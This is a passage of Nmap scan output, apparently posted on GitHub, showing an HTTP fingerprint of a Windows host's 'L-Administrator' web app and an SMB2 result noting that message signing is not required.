| SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css | |
| SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j | |
| SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\. | |
| SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You | |
| SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20")%r(HTT | |
| SF:POptions,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont | |
| SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range | |
| SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\ | |
| SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi | |
| SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti | |
| SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\ | |
| SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/> | |
| SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal | |
| SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n | |
| SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre | |
| SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\. | |
| SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css | |
| SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j | |
| SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\. | |
| SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You | |
| SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20"); | |
| Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows | |
| Host script results: | |
| | smb2-security-mode: | |
| | 2.02: | |
| |_ Message signing enabled but not required | |
| | smb2-time: | |
| | date: 2024-07-30T23:35:22 | |
| |_ start_date: N/A |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment